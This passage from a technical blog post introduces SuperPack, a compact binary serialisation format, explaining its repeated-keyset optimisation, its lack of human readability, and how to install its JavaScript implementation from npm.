When an encoder sees multiple maps with the same set of keys, it can make an optional optimisation that is reminiscent of the schema-directed encoding approach but with the schema included in the payload. Instead of storing the key names once for each map, it can use what we call a “repeated keyset optimisation” to refer back to the object shape and encode its values as a super-efficient contiguous byte sequence.

The downside of this compactness is that, unlike JSON, YAML, or edn, SuperPack payloads are not human-readable.

Conclusion

After surveying existing data serialisation formats, we knew we could design one that would be better suited to our particular use case. And our use case is not so rare as to make SuperPack only useful to us; it is very much a general purpose serialisation format. If you want to create very small payloads for arbitrary data of an unknown schema in an environment without access to a lossless data compression algorithm, SuperPack is for you. If you want to see a more direct comparison to similar formats, see the comparison table in the specification.

I’m sold. How do I use it?

As of now, we have an open-source JavaScript implementation of SuperPack.

$ npm install --save superpack